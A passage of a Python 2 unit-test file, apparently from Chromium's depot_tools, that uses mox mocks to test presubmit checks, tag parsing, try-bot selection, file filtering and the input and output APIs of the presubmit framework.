join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(presubmit_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(presubmit_path, 'rU' ).AndReturn(self.presubmit_text) presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU').AndReturn( self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks(change, False, True, None, None, None, False, None) self.assertEqual(output.getvalue().count('??'), 2) self.assertEqual(output.getvalue().count('XX!!XX'), 2) self.assertEqual(output.getvalue().count('(y/N)'), 0) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoDefaultPresubmitChecksAndFeedback(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] DEFAULT_SCRIPT = """ def CheckChangeOnUpload(input_api, output_api): return [output_api.PresubmitError("!!")] def CheckChangeOnCommit(input_api, output_api): raise Exception("Test error") """ inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'PRESUBMIT.py') ).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py')).AndReturn(False) presubmit.random.randint(0, 4).AndReturn(0) self.mox.ReplayAll() input_buf = StringIO.StringIO('y\n') # Always fail. change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, DEFAULT_SCRIPT, False, None) self.failIf(output.should_continue()) text = ( 'Running presubmit upload checks ...\n' 'Warning, no PRESUBMIT.py found.\n' 'Running default presubmit script.\n' '\n' '** Presubmit ERRORS **\n!!\n\n' 'Was the presubmit check useful? If not, run "git cl presubmit -v"\n' 'to figure out which PRESUBMIT.py was run, then run git blame\n' 'on the file to figure out who to ask for help.\n') self.assertEquals(output.getvalue(), text) def testDirectoryHandling(self): files = [ ['A', 'isdir'], ['A', presubmit.os.path.join('isdir', 'blat.cc')], ] isdir = presubmit.os.path.join(self.fake_root_dir, 'isdir') blat = presubmit.os.path.join(isdir, 'blat.cc') presubmit.os.path.exists(isdir).AndReturn(True) presubmit.os.path.isdir(isdir).AndReturn(True) presubmit.os.path.exists(blat).AndReturn(True) presubmit.os.path.isdir(blat).AndReturn(False) self.mox.ReplayAll() change = presubmit.Change( 'mychange', 'foo', self.fake_root_dir, files, 0, 0, None) affected_files = change.AffectedFiles(include_dirs=False) self.failUnless(len(affected_files) == 1) self.failUnless(affected_files[0].LocalPath().endswith('blat.cc')) affected_files_and_dirs = change.AffectedFiles(include_dirs=True) self.failUnless(len(affected_files_and_dirs) == 2) def testTags(self): DEFAULT_SCRIPT = """ def CheckChangeOnUpload(input_api, output_api): if input_api.change.tags['BUG'] != 'boo': return [output_api.PresubmitError('Tag parsing failed. 1')] if input_api.change.tags['STORY'] != 'http://tracker.com/42': return [output_api.PresubmitError('Tag parsing failed. 2')] if input_api.change.BUG != 'boo': return [output_api.PresubmitError('Tag parsing failed. 6')] if input_api.change.STORY != 'http://tracker.com/42': return [output_api.PresubmitError('Tag parsing failed. 7')] try: y = False x = input_api.change.invalid except AttributeError: y = True if not y: return [output_api.PresubmitError('Tag parsing failed. 8')] if 'TEST' in input_api.change.tags: return [output_api.PresubmitError('Tag parsing failed. 3')] if input_api.change.DescriptionText() != 'Blah Blah': return [output_api.PresubmitError('Tag parsing failed. 4 ' + input_api.change.DescriptionText())] if (input_api.change.FullDescriptionText() != 'Blah Blah\\n\\nSTORY=http://tracker.com/42\\nBUG=boo\\n'): return [output_api.PresubmitError('Tag parsing failed. 5 ' + input_api.change.FullDescriptionText())] return [output_api.PresubmitNotifyResult(input_api.change.tags['STORY'])] def CheckChangeOnCommit(input_api, output_api): raise Exception("Test error") """ presubmit.random.randint(0, 4).AndReturn(1) inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) self.mox.ReplayAll() output = StringIO.StringIO() input_buf = StringIO.StringIO('y\n') change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) self.failUnless(presubmit.DoPresubmitChecks( change, False, True, output, input_buf, DEFAULT_SCRIPT, False, None)) self.assertEquals(output.getvalue(), ('Running presubmit upload checks ...\n' 'Warning, no PRESUBMIT.py found.\n' 'Running default presubmit script.\n' '\n' '** Presubmit Messages **\n' 'http://tracker.com/42\n' '\n' 'Presubmit checks passed.\n')) def testGetTrySlavesExecuter(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTrySlavesExecuter() self.assertEqual([], executer.ExecPresubmitScript('', '', '', change)) self.assertEqual([], executer.ExecPresubmitScript('def foo():\n return\n', '', '', change)) # bad results starts_with_space_result = [' starts_with_space'] not_list_result1 = "'foo'" not_list_result2 = "('a', 'tuple')" mixed_old_and_new = ['bot', ('bot2', set(['test']))] not_set = [('bot2', ['test'])] for result in ( starts_with_space_result, not_list_result1, not_list_result2, mixed_old_and_new, not_set): self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, self.presubmit_tryslave % result, '', '', change) # good results expected_result = ['1', '2', '3'] empty_result = [] space_in_name_result = ['foo bar', '1\t2 3'] new_style = [('bot', set(['cool', 'tests']))] for result in ( expected_result, empty_result, space_in_name_result, new_style): self.assertEqual( result, executer.ExecPresubmitScript( self.presubmit_tryslave % result, '', '', change)) def testGetTrySlavesExecuterWithProject(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTrySlavesExecuter() expected_result1 = ['1', '2'] expected_result2 = ['a', 'b', 'c'] script = self.presubmit_tryslave_project % ( repr('foo'), repr(expected_result1), repr(expected_result2)) self.assertEqual( expected_result1, executer.ExecPresubmitScript(script, '', 'foo', change)) self.assertEqual( expected_result2, executer.ExecPresubmitScript(script, '', 'bar', change)) def testDoGetTrySlaves(self): join = presubmit.os.path.join filename = 'foo.cc' filename_linux = join('linux_only', 'penguin.cc') root_presubmit = join(self.fake_root_dir, 'PRESUBMIT.py') linux_presubmit = join(self.fake_root_dir, 'linux_only', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_presubmit).AndReturn(True) presubmit.gclient_utils.FileRead(root_presubmit, 'rU').AndReturn( self.presubmit_tryslave % '["win"]') presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_presubmit).AndReturn(True) presubmit.os.path.isfile(linux_presubmit).AndReturn(True) presubmit.gclient_utils.FileRead(root_presubmit, 'rU').AndReturn( self.presubmit_tryslave % '["win"]') presubmit.gclient_utils.FileRead(linux_presubmit, 'rU').AndReturn( self.presubmit_tryslave % '["linux"]') self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) output = StringIO.StringIO() self.assertEqual(['win'], presubmit.DoGetTrySlaves(change, [filename], self.fake_root_dir, None, None, False, output)) output = StringIO.StringIO() self.assertEqual(['win', 'linux'], presubmit.DoGetTrySlaves(change, [filename, filename_linux], self.fake_root_dir, None, None, False, output)) def testGetTrySlavesExecuter_ok(self): script_text = ( 'def GetPreferredTrySlaves():\n' ' return ["foo", "bar"]\n') results = presubmit.GetTrySlavesExecuter.ExecPresubmitScript( script_text, 'path', 'project', None) self.assertEquals(['foo', 'bar'], results) def testGetTrySlavesExecuter_comma(self): script_text = ( 'def GetPreferredTrySlaves():\n' ' return ["foo,bar"]\n') try: presubmit.GetTrySlavesExecuter.ExecPresubmitScript( script_text, 'path', 'project', None) self.fail() except presubmit.PresubmitFailure: pass def testGetTryMastersExecuter(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'Blah Blah\n\nSTORY=http://tracker.com/42\nBUG=boo\n', self.fake_root_dir, None, 0, 0, None) executer = presubmit.GetTryMastersExecuter() self.assertEqual({}, executer.ExecPresubmitScript('', '', '', change)) self.assertEqual({}, executer.ExecPresubmitScript('def foo():\n return\n', '', '', change)) expected_result = {'m1': {'s1': set(['t1', 't2'])}, 'm2': {'s1': set(['defaulttests']), 's2': set(['defaulttests'])}} empty_result1 = {} empty_result2 = {'m': {}} space_in_name_result = {'m r': {'s\tv': set(['t1'])}} for result in ( expected_result, empty_result1, empty_result2, space_in_name_result): self.assertEqual( result, executer.ExecPresubmitScript( self.presubmit_trymaster % result, '', '', change)) def testMergeMasters(self): merge = presubmit._MergeMasters self.assertEqual({}, merge({}, {})) self.assertEqual({'m1': {}}, merge({}, {'m1': {}})) self.assertEqual({'m1': {}}, merge({'m1': {}}, {})) parts = [ {'try1.cr': {'win': set(['defaulttests'])}}, {'try1.cr': {'linux1': set(['test1'])}, 'try2.cr': {'linux2': set(['defaulttests'])}}, {'try1.cr': {'mac1': set(['defaulttests']), 'mac2': set(['test1', 'test2']), 'linux1': set(['defaulttests'])}}, ] expected = { 'try1.cr': {'win': set(['defaulttests']), 'linux1': set(['defaulttests', 'test1']), 'mac1': set(['defaulttests']), 'mac2': set(['test1', 'test2'])}, 'try2.cr': {'linux2': set(['defaulttests'])}, } for permutation in itertools.permutations(parts): self.assertEqual(expected, reduce(merge, permutation, {})) def testDoGetTryMasters(self): root_text = (self.presubmit_trymaster % '{"t1.cr": {"win": set(["defaulttests"])}}') linux_text = (self.presubmit_trymaster % ('{"t1.cr": {"linux1": set(["t1"])},' ' "t2.cr": {"linux2": set(["defaulttests"])}}')) join = presubmit.os.path.join isfile = presubmit.os.path.isfile FileRead = presubmit.gclient_utils.FileRead filename = 'foo.cc' filename_linux = join('linux_only', 'penguin.cc') root_presubmit = join(self.fake_root_dir, 'PRESUBMIT.py') linux_presubmit = join(self.fake_root_dir, 'linux_only', 'PRESUBMIT.py') inherit_path = join(self.fake_root_dir, self._INHERIT_SETTINGS) isfile(inherit_path).AndReturn(False) isfile(root_presubmit).AndReturn(True) FileRead(root_presubmit, 'rU').AndReturn(root_text) isfile(inherit_path).AndReturn(False) isfile(root_presubmit).AndReturn(True) isfile(linux_presubmit).AndReturn(True) FileRead(root_presubmit, 'rU').AndReturn(root_text) FileRead(linux_presubmit, 'rU').AndReturn(linux_text) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) output = StringIO.StringIO() self.assertEqual({'t1.cr': {'win': ['defaulttests']}}, presubmit.DoGetTryMasters(change, [filename], self.fake_root_dir, None, None, False, output)) output = StringIO.StringIO() expected = { 't1.cr': {'win': ['defaulttests'], 'linux1': ['t1']}, 't2.cr': {'linux2': ['defaulttests']}, } self.assertEqual(expected, presubmit.DoGetTryMasters(change, [filename, filename_linux], self.fake_root_dir, None, None, False, output)) def testMainUnversioned(self): # OptParser calls presubmit.os.path.exists and is a pain when mocked. self.UnMock(presubmit.os.path, 'exists') self.mox.StubOutWithMock(presubmit, 'DoPresubmitChecks') self.mox.StubOutWithMock(presubmit, 'ParseFiles') presubmit.scm.determine_scm(self.fake_root_dir).AndReturn(None) presubmit.ParseFiles(['random_file.txt'], None ).AndReturn([('M', 'random_file.txt')]) output = self.mox.CreateMock(presubmit.PresubmitOutput) output.should_continue().AndReturn(False) presubmit.DoPresubmitChecks(mox.IgnoreArg(), False, False, mox.IgnoreArg(), mox.IgnoreArg(), None, False, None).AndReturn(output) self.mox.ReplayAll() self.assertEquals( True, presubmit.main(['--root', self.fake_root_dir, 'random_file.txt'])) def testMainUnversionedFail(self): # OptParser calls presubmit.os.path.exists and is a pain when mocked. self.UnMock(presubmit.os.path, 'exists') self.mox.StubOutWithMock(presubmit, 'DoPresubmitChecks') self.mox.StubOutWithMock(presubmit, 'ParseFiles') presubmit.scm.determine_scm(self.fake_root_dir).AndReturn(None) self.mox.StubOutWithMock(presubmit.sys, 'stderr') presubmit.sys.stderr.write( 'Usage: presubmit_unittest.py [options] <files...>\n') presubmit.sys.stderr.write('\n') presubmit.sys.stderr.write( 'presubmit_unittest.py: error: For unversioned directory, <files> is ' 'not optional.\n') self.mox.ReplayAll() try: presubmit.main(['--root', self.fake_root_dir]) self.fail() except SystemExit, e: self.assertEquals(2, e.code) class InputApiUnittest(PresubmitTestsBase): """Tests presubmit.InputApi.""" def testMembersChanged(self): self.mox.ReplayAll() members = [ 'AbsoluteLocalPaths', 'AffectedFiles', 'AffectedSourceFiles', 'AffectedTextFiles', 'DEFAULT_BLACK_LIST', 'DEFAULT_WHITE_LIST', 'DepotToLocalPath', 'FilterSourceFile', 'LocalPaths', 'LocalToDepotPath', 'Command', 'RunTests', 'PresubmitLocalPath', 'ReadFile', 'RightHandSideLines', 'ServerPaths', 'basename', 'cPickle', 'cpplint', 'cStringIO', 'canned_checks', 'change', 'cpu_count', 'environ', 'glob', 'host_url', 'is_committing', 'json', 'logging', 'marshal', 'os_listdir', 'os_walk', 'os_path', 'os_stat', 'owners_db', 'pickle', 'platform', 'python_executable', 're', 'rietveld', 'subprocess', 'tbr', 'tempfile', 'time', 'traceback', 'unittest', 'urllib2', 'version', 'verbose', ] # If this test fails, you should add the relevant test. self.compareMembers( presubmit.InputApi(self.fake_change, './.', False, None, False), members) def testDepotToLocalPath(self): presubmit.scm.SVN._CaptureInfo(['svn://foo/smurf'], self.fake_root_dir ).AndReturn({'Path': 'prout'}) presubmit.scm.SVN._CaptureInfo( ['svn:/foo/notfound/burp'], self.fake_root_dir ).AndReturn({}) self.mox.ReplayAll() path = presubmit.InputApi( self.fake_change, './p', False, None, False).DepotToLocalPath( 'svn://foo/smurf') self.failUnless(path == 'prout') path = presubmit.InputApi( self.fake_change, './p', False, None, False).DepotToLocalPath( 'svn:/foo/notfound/burp') self.failUnless(path == None) def testLocalToDepotPath(self): presubmit.scm.SVN._CaptureInfo(['smurf'], self.fake_root_dir ).AndReturn({'URL': 'svn://foo'}) presubmit.scm.SVN._CaptureInfo(['notfound-food'], self.fake_root_dir ).AndReturn({}) self.mox.ReplayAll() path = presubmit.InputApi( self.fake_change, './p', False, None, False).LocalToDepotPath( 'smurf') self.assertEqual(path, 'svn://foo') path = presubmit.InputApi( self.fake_change, './p', False, None, False).LocalToDepotPath( 'notfound-food') self.assertEquals(path, None) def testInputApiConstruction(self): self.mox.ReplayAll() api = presubmit.InputApi( self.fake_change, presubmit_path='foo/path/PRESUBMIT.py', is_committing=False, rietveld_obj=None, verbose=False) self.assertEquals(api.PresubmitLocalPath(), 'foo/path') self.assertEquals(api.change, self.fake_change) self.assertEquals(api.host_url, 'http://codereview.chromium.org') def testInputApiPresubmitScriptFiltering(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text') files = [ ['A', join('foo', 'blat.cc')], ['M', join('foo', 'blat', 'READ_ME2')], ['M', join('foo', 'blat', 'binary.dll')], ['M', join('foo', 'blat', 'weird.xyz')], ['M', join('foo', 'blat', 'another.h')], ['M', join('foo', 'third_party', 'third.cc')], ['D', join('foo', 'mat', 'beingdeleted.txt')], ['M', join('flop', 'notfound.txt')], ['A', join('boo', 'flap.h')], ] blat = presubmit.normpath(join(self.fake_root_dir, files[0][1])) readme = presubmit.normpath(join(self.fake_root_dir, files[1][1])) binary = presubmit.normpath(join(self.fake_root_dir, files[2][1])) weird = presubmit.normpath(join(self.fake_root_dir, files[3][1])) another = presubmit.normpath(join(self.fake_root_dir, files[4][1])) third_party = presubmit.normpath(join(self.fake_root_dir, files[5][1])) beingdeleted = presubmit.normpath(join(self.fake_root_dir, files[6][1])) notfound = presubmit.normpath(join(self.fake_root_dir, files[7][1])) flap = presubmit.normpath(join(self.fake_root_dir, files[8][1])) for i in (blat, readme, binary, weird, another, third_party): presubmit.os.path.exists(i).AndReturn(True) presubmit.os.path.isdir(i).AndReturn(False) presubmit.os.path.exists(beingdeleted).AndReturn(False) presubmit.os.path.exists(notfound).AndReturn(False) presubmit.os.path.exists(flap).AndReturn(True) presubmit.os.path.isdir(flap).AndReturn(False) presubmit.scm.SVN._CaptureInfo( [files[6][1]], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN._CaptureInfo( [files[7][1]], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN.GetFileProperty( files[0][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[1][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[2][1], 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') presubmit.scm.SVN.GetFileProperty( files[3][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[4][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GetFileProperty( files[5][1], 'svn:mime-type', self.fake_root_dir ).AndReturn(None) presubmit.scm.SVN.GenerateDiff( [files[0][1]], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) presubmit.scm.SVN.GenerateDiff( [files[4][1]], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, join(self.fake_root_dir, 'foo', 'PRESUBMIT.py'), False, None, False) # Doesn't filter much got_files = input_api.AffectedFiles() self.assertEquals(len(got_files), 7) self.assertEquals(got_files[0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEquals(got_files[1].LocalPath(), presubmit.normpath(files[1][1])) self.assertEquals(got_files[2].LocalPath(), presubmit.normpath(files[2][1])) self.assertEquals(got_files[3].LocalPath(), presubmit.normpath(files[3][1])) self.assertEquals(got_files[4].LocalPath(), presubmit.normpath(files[4][1])) self.assertEquals(got_files[5].LocalPath(), presubmit.normpath(files[5][1])) self.assertEquals(got_files[6].LocalPath(), presubmit.normpath(files[6][1])) # Ignores weird because of whitelist, third_party because of blacklist, # binary isn't a text file and beingdeleted doesn't exist. The rest is # outside foo/. rhs_lines = [x for x in input_api.RightHandSideLines(None)] self.assertEquals(len(rhs_lines), 14) self.assertEqual(rhs_lines[0][0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEqual(rhs_lines[3][0].LocalPath(), presubmit.normpath(files[0][1])) self.assertEqual(rhs_lines[7][0].LocalPath(), presubmit.normpath(files[4][1])) self.assertEqual(rhs_lines[13][0].LocalPath(), presubmit.normpath(files[4][1])) def testDefaultWhiteListBlackListFilters(self): def f(x): return presubmit.AffectedFile(x, 'M', self.fake_root_dir, None) files = [ ( [ # To be tested. f('testing_support/google_appengine/b'), f('testing_support/not_google_appengine/foo.cc'), ], [ # Expected. 'testing_support/not_google_appengine/foo.cc', ], ), ( [ # To be tested. f('a/experimental/b'), f('experimental/b'), f('a/experimental'), f('a/experimental.cc'), f('a/experimental.S'), ], [ # Expected. 'a/experimental.cc', 'a/experimental.S', ], ), ( [ # To be tested. f('a/third_party/b'), f('third_party/b'), f('a/third_party'), f('a/third_party.cc'), ], [ # Expected. 'a/third_party.cc', ], ), ( [ # To be tested. f('a/LOL_FILE/b'), f('b.c/LOL_FILE'), f('a/PRESUBMIT.py'), f('a/FOO.json'), f('a/FOO.java'), ], [ # Expected. 'a/PRESUBMIT.py', 'a/FOO.java', ], ), ( [ # To be tested. f('a/.git'), f('b.c/.git'), f('a/.git/bleh.py'), f('.git/bleh.py'), f('bleh.diff'), f('foo/bleh.patch'), ], [ # Expected. ], ), ] input_api = presubmit.InputApi( self.fake_change, './PRESUBMIT.py', False, None, False) self.mox.ReplayAll() self.assertEqual(len(input_api.DEFAULT_WHITE_LIST), 22) self.assertEqual(len(input_api.DEFAULT_BLACK_LIST), 12) for item in files: results = filter(input_api.FilterSourceFile, item[0]) for i in range(len(results)): self.assertEquals(results[i].LocalPath(), presubmit.normpath(item[1][i])) # Same number of expected results. self.assertEquals(sorted([f.LocalPath().replace(presubmit.os.sep, '/') for f in results]), sorted(item[1])) def testCustomFilter(self): def FilterSourceFile(affected_file): return 'a' in affected_file.LocalPath() files = [('A', 'eeaee'), ('M', 'eeabee'), ('M', 'eebcee')] for _, item in files: full_item = presubmit.os.path.join(self.fake_root_dir, item) presubmit.os.path.exists(full_item).AndReturn(True) presubmit.os.path.isdir(full_item).AndReturn(False) presubmit.scm.SVN.GetFileProperty( item, 'svn:mime-type', self.fake_root_dir).AndReturn(None) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, 'PRESUBMIT.py'), False, None, False) got_files = input_api.AffectedSourceFiles(FilterSourceFile) self.assertEquals(len(got_files), 2) self.assertEquals(got_files[0].LocalPath(), 'eeaee') self.assertEquals(got_files[1].LocalPath(), 'eeabee') def testLambdaFilter(self): white_list = presubmit.InputApi.DEFAULT_BLACK_LIST + (r".*?a.*?",) black_list = [r".*?b.*?"] files = [('A', 'eeaee'), ('M', 'eeabee'), ('M', 'eebcee'), ('M', 'eecaee')] for _, item in files: full_item = presubmit.os.path.join(self.fake_root_dir, item) presubmit.os.path.exists(full_item).AndReturn(True) presubmit.os.path.isdir(full_item).AndReturn(False) presubmit.scm.SVN.GetFileProperty( item, 'svn:mime-type', self.fake_root_dir).AndReturn(None) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '', self.fake_root_dir, files, 0, 0, None) input_api = presubmit.InputApi( change, './PRESUBMIT.py', False, None, False) # Sample usage of overiding the default white and black lists. got_files = input_api.AffectedSourceFiles( lambda x: input_api.FilterSourceFile(x, white_list, black_list)) self.assertEquals(len(got_files), 2) self.assertEquals(got_files[0].LocalPath(), 'eeaee') self.assertEquals(got_files[1].LocalPath(), 'eecaee') def testGetAbsoluteLocalPath(self): join = presubmit.os.path.join normpath = presubmit.normpath # Regression test for bug of presubmit stuff that relies on invoking # SVN (e.g. to get mime type of file) not working unless gcl invoked # from the client root (e.g. if you were at 'src' and did 'cd base' before # invoking 'gcl upload' it would fail because svn wouldn't find the files # the presubmit script was asking about). files = [ ['A', 'isdir'], ['A', join('isdir', 'blat.cc')], ['M', join('elsewhere', 'ouf.cc')], ] self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, files, 0, 0, None) affected_files = change.AffectedFiles(include_dirs=True) # Local paths should remain the same self.assertEquals(affected_files[0].LocalPath(), normpath('isdir')) self.assertEquals(affected_files[1].LocalPath(), normpath('isdir/blat.cc')) # Absolute paths should be prefixed self.assertEquals(affected_files[0].AbsoluteLocalPath(), normpath(join(self.fake_root_dir, 'isdir'))) self.assertEquals(affected_files[1].AbsoluteLocalPath(), normpath(join(self.fake_root_dir, 'isdir/blat.cc'))) # New helper functions need to work paths_from_change = change.AbsoluteLocalPaths(include_dirs=True) self.assertEqual(len(paths_from_change), 3) presubmit_path = join(self.fake_root_dir, 'isdir', 'PRESUBMIT.py') api = presubmit.InputApi( change=change, presubmit_path=presubmit_path, is_committing=True, rietveld_obj=None, verbose=False) paths_from_api = api.AbsoluteLocalPaths(include_dirs=True) self.assertEqual(len(paths_from_api), 2) for absolute_paths in [paths_from_change, paths_from_api]: self.assertEqual(absolute_paths[0], normpath(join(self.fake_root_dir, 'isdir'))) self.assertEqual(absolute_paths[1], normpath(join(self.fake_root_dir, 'isdir', 'blat.cc'))) def testDeprecated(self): presubmit.warn(mox.IgnoreArg(), category=mox.IgnoreArg(), stacklevel=2) self.mox.ReplayAll() change = presubmit.Change( 'mychange', '', self.fake_root_dir, [], 0, 0, None) api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, 'foo', 'PRESUBMIT.py'), True, None, False) api.AffectedTextFiles(include_deletes=False) def testReadFileStringDenied(self): self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) self.assertRaises(IOError, input_api.ReadFile, 'boo', 'x') def testReadFileStringAccepted(self): path = presubmit.os.path.join(self.fake_root_dir, 'AA/boo') presubmit.gclient_utils.FileRead(path, 'x').AndReturn(None) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) input_api.ReadFile(path, 'x') def testReadFileAffectedFileDenied(self): fileobj = presubmit.AffectedFile('boo', 'M', 'Unrelated', diff_cache=mox.IsA(presubmit._DiffCache)) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) self.assertRaises(IOError, input_api.ReadFile, fileobj, 'x') def testReadFileAffectedFileAccepted(self): fileobj = presubmit.AffectedFile('AA/boo', 'M', self.fake_root_dir, diff_cache=mox.IsA(presubmit._DiffCache)) presubmit.gclient_utils.FileRead(fileobj.AbsoluteLocalPath(), 'x' ).AndReturn(None) self.mox.ReplayAll() change = presubmit.Change( 'foo', 'foo', self.fake_root_dir, [('M', 'AA')], 0, 0, None) input_api = presubmit.InputApi( change, presubmit.os.path.join(self.fake_root_dir, '/p'), False, None, False) input_api.ReadFile(fileobj, 'x') class OutputApiUnittest(PresubmitTestsBase): """Tests presubmit.OutputApi.""" def testMembersChanged(self): self.mox.ReplayAll() members = [ 'MailTextResult', 'PresubmitAddReviewers', 'PresubmitError', 'PresubmitNotifyResult', 'PresubmitPromptWarning', 'PresubmitPromptOrNotify', 'PresubmitResult', 'is_committing', ] # If this test fails, you should add the relevant test. self.compareMembers(presubmit.OutputApi(False), members) def testOutputApiBasics(self): self.mox.ReplayAll() self.failUnless(presubmit.OutputApi.PresubmitError('').fatal) self.failIf(presubmit.OutputApi.PresubmitError('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitPromptWarning('').fatal) self.failUnless( presubmit.OutputApi.PresubmitPromptWarning('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitNotifyResult('').fatal) self.failIf(presubmit.OutputApi.PresubmitNotifyResult('').should_prompt) self.failIf(presubmit.OutputApi.PresubmitAddReviewers( ['foo']).fatal) self.failIf(presubmit.OutputApi.PresubmitAddReviewers( ['foo']).should_prompt) # TODO(joi) Test MailTextResult once implemented. def testOutputApiHandling(self): self.mox.ReplayAll() output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitAddReviewers( ['[email protected]']).handle(output) self.failUnless(output.should_continue()) self.failUnlessEqual(output.reviewers, ['[email protected]']) output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitError('!!!').handle(output) self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('!!!')) output = presubmit.PresubmitOutput() presubmit.OutputApi.PresubmitNotifyResult('?see?').handle(output) self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('?see?')) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) presubmit.OutputApi.PresubmitPromptWarning('???').handle(output) output.prompt_yes_no('prompt: ') self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('\n')) presubmit.OutputApi.PresubmitPromptWarning('???').handle(output) output.prompt_yes_no('prompt: ') self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(True) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) output_api.PresubmitPromptOrNotify('???').handle(output) output.prompt_yes_no('prompt: ') self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(False) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('y')) output_api.PresubmitPromptOrNotify('???').handle(output) self.failUnless(output.should_continue()) self.failUnless(output.getvalue().count('???')) output_api = presubmit.OutputApi(True) output = presubmit.PresubmitOutput(input_stream=StringIO.StringIO('\n')) output_api.PresubmitPromptOrNotify('???').handle(output) output.prompt_yes_no('prompt: ') self.failIf(output.should_continue()) self.failUnless(output.getvalue().count('???')) class AffectedFileUnittest(PresubmitTestsBase): def testMembersChanged(self): self.mox.ReplayAll() members = [ 'AbsoluteLocalPath', 'Action', 'ChangedContents', 'DIFF_CACHE', 'GenerateScmDiff', 'IsDirectory', 'IsTextFile', 'LocalPath', 'NewContents', 'Property', 'ServerPath', ] # If this test fails, you should add the relevant test. self.compareMembers( presubmit.AffectedFile('a', 'b', self.fake_root_dir, None), members) self.compareMembers( presubmit.SvnAffectedFile('a', 'b', self.fake_root_dir, None), members) self.compareMembers( presubmit.GitAffectedFile('a', 'b', self.fake_root_dir, None), members) def testAffectedFile(self): path = presubmit.os.path.join('foo', 'blat.cc') f_path = presubmit.os.path.join(self.fake_root_dir, path) presubmit.os.path.exists(f_path).AndReturn(True) presubmit.os.path.isdir(f_path).AndReturn(False) 